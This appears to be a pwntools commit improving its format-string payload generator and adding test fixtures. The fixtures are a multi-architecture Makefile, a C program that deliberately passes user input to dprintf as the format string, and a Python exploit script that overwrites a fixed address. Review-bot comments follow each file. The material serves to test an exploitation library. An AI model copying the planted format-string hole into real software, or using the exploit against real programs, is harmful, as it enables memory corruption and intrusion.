
Improve format string generator (#1216)

* feat(fmtstr): place pointers after format operations

This means that the format string can now also work in certain
cases even if the pointers contain null bytes.

That's especially important on 64 bit where most pointers contain null bytes.

* fix(fmtstr): more stuff

* feat(fmtstr): optimize

* perf(fmtstr): make sorting run in reasonable time (not perfect yet)

* perf(fmtstr): be faster

* style(fmtstr): more docs, some cleanup

* fix(fmtstr): small fixes + more docs

* style(fmtstr): cleanup small style issues

* fix(fmtstr): fix handling of szmax in merge_atoms_overlapping

* fix(fmtstr): fix Atom __getitem__ for out-of-bounds index

* refactor(fmtstr): docs and cleaner code

* fix(fmtstr): small test/doc fixes

* tests(fmtstr): add example as tests for other arches

* doc(fmtstr): more docstrings

* fix(fmtstr): fix cyclic_find warnings

* refactor(fmtstr): remove another nested function

* tests(fmtstr): fix doctest output for wrong arch

* style(fmtstr): remove unused imports

* tests(fmtstr): add binaries for tests
bennofs authored and Arusekk committed Sep 24, 2019
1 parent 138fecf commit d2b9e48cf032df7cd292e78dbd192f57e97f0cd4
@@ -0,0 +1,51 @@
CFLAGS := -Wno-unused-result -Wno-format-security
TARGETS := printf.mips printf.mips64 printf.mipsel printf.mips64el printf.arm printf.aarch64 \
printf.ppc printf.ppc64 printf.sparc64 printf.native printf.native32

.PHONY: run
run: all
./exploit.py

.PHONY: all
all: $(TARGETS)

.PHONY: clean
clean:
rm -f $(TARGETS)

# mips variants
%.mips: %.c
mips-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mipsel: %.c
mipsel-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64: %.c
mips64-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64el: %.c
mips64el-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^

# arm variants
%.arm: %.c
arm-linux-gnueabi-gcc $(CFLAGS) -static -Os -o "$@" $^
%.aarch64: %.c
aarch64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# ppc variants
%.ppc: %.c
powerpc-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.ppc64: %.c
powerpc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# sparc variants
%.sparc64: %.c
sparc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# native variants
%.native: %.c
gcc $(CFLAGS) -o "$@" $^
%.native32: %.c
i686-linux-gnu-gcc $(CFLAGS) -o "$@" $^

# install deps on ubuntu xenial
.PHONY: install-apt
install-apt:
apt-get install -y make gcc-mips64el-linux-gnuabi64 gcc-sparc64-linux-gnu gcc-powerpc64-linux-gnu gcc-powerpc-linux-gnu gcc-arm-linux-gnueabi gcc-aarch64-linux-gnu gcc-mips64-linux-gnuabi64 gcc-mipsel-linux-gnu gcc-mips64el-linux-gnuabi64 gcc-mips-linux-gnu gcc-i686-linux-gnu gcc
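Review bot: `-Wno-format-security` in `CFLAGS` on the first line silences exactly the warning the fixture's bug would raise, but nothing says so; a comment such as `# -Wno-format-security: printf.c deliberately passes user input as the format string (the bug under test)` would stop a later cleanup from dropping the flag or "fixing" the source. `-static -Os` is repeated verbatim in each of the nine cross-compile rules; hoisting it into a variable, e.g. `CROSS_FLAGS := -static -Os`, and writing `$(CROSS_FLAGS)` in those rules keeps them from drifting apart. The two native rules omit `-static`, so those binaries load the host libc dynamically — presumably intended so both layouts are covered, but a comment on the `# native variants` line would make that explicit.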
@@ -0,0 +1,39 @@
#!/usr/bin/env python2
from pwn import *

@context.quiet
def exec_fmt(payload):
p = context.binary.process()
p.sendline(payload)
return p.recvall()

def exploit(binary):
context.binary = ELF(binary)
autofmt = FmtStr(exec_fmt)
offset = autofmt.offset
with context.binary.process() as p:
addr = unpack(p.recv(context.bytes))
payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
p.sendline(payload)
p.recvuntil("DONE")
print hex(u32(p.recv(4)))

binaries = [
"printf.mips",
"printf.mips64",
"printf.mipsel",
"printf.mips64el",
"printf.native",
"printf.native32",
"printf.ppc",
"printf.ppc64",
"printf.sparc64",
"printf.arm",
"printf.aarch64",
]

if len(sys.argv) > 1:
binaries = sys.argv[1:]

for binary in binaries:
exploit(binary)
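Review bot: `exploit` only prints the value read back after `DONE` (`print hex(u32(p.recv(4)))`), so `make run` exits 0 even when the format-string write missed; comparing it against the value written on the `fmtstr_payload` line turns the script into a real check: `result = u32(p.recv(4))`, `print hex(result)`, `assert result == 0x1337babe, binary`. Naming `binary` in the assertion message also tells the reader which of the eleven targets failed, which the current output does not. `exec_fmt` and `exploit` have no docstrings; a one-liner on `exec_fmt` such as `"""Run the current context.binary once with payload on stdin and return all of its output (the probe callback handed to FmtStr)."""` would document the contract `FmtStr` relies on.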
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,29 @@
#ifdef _FORTIFY_SOURCE
#undef _FORTIFY_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define MEMORY_ADDRESS ((void*)0x11110000)
#define MEMORY_SIZE 1024
#define TARGET ((int *) 0x11110100)
int main(int argc, char const *argv[])
{
char buff[1024];
void *ptr = NULL;
int *my_var = TARGET;
ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if(ptr != MEMORY_ADDRESS)
{
perror("mmap");
return EXIT_FAILURE;
}
*my_var = 0x41414141;
write(1, &my_var, sizeof(int *));
scanf("%s", buff);
dprintf(2, buff);
write(1, "DONE", 4);
write(1, my_var, sizeof(int));
return 0;
}
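Review bot: `scanf("%s", buff)` on the line before `dprintf` has no width limit and its return value is ignored, so an input longer than 1023 bytes overruns `buff` and an empty stdin leaves `buff` uninitialised before it is used as the format string; `if (scanf("%1023s", buff) != 1) return EXIT_FAILURE;` keeps the fixture's behaviour on the intended path and turns a failed read into a clean exit instead of an unrelated crash. The `#undef _FORTIFY_SOURCE` at the top also deserves a comment, since glibc's fortified printf rejects `%n` when the format string lives in writable memory: `/* fortified printf refuses %n in a writable format string; this fixture needs it */`. The `write(1, &my_var, ...)` before `scanf` is what exploit.py reads back as `addr`; a comment saying so would tie the two files together for the next reader.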
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
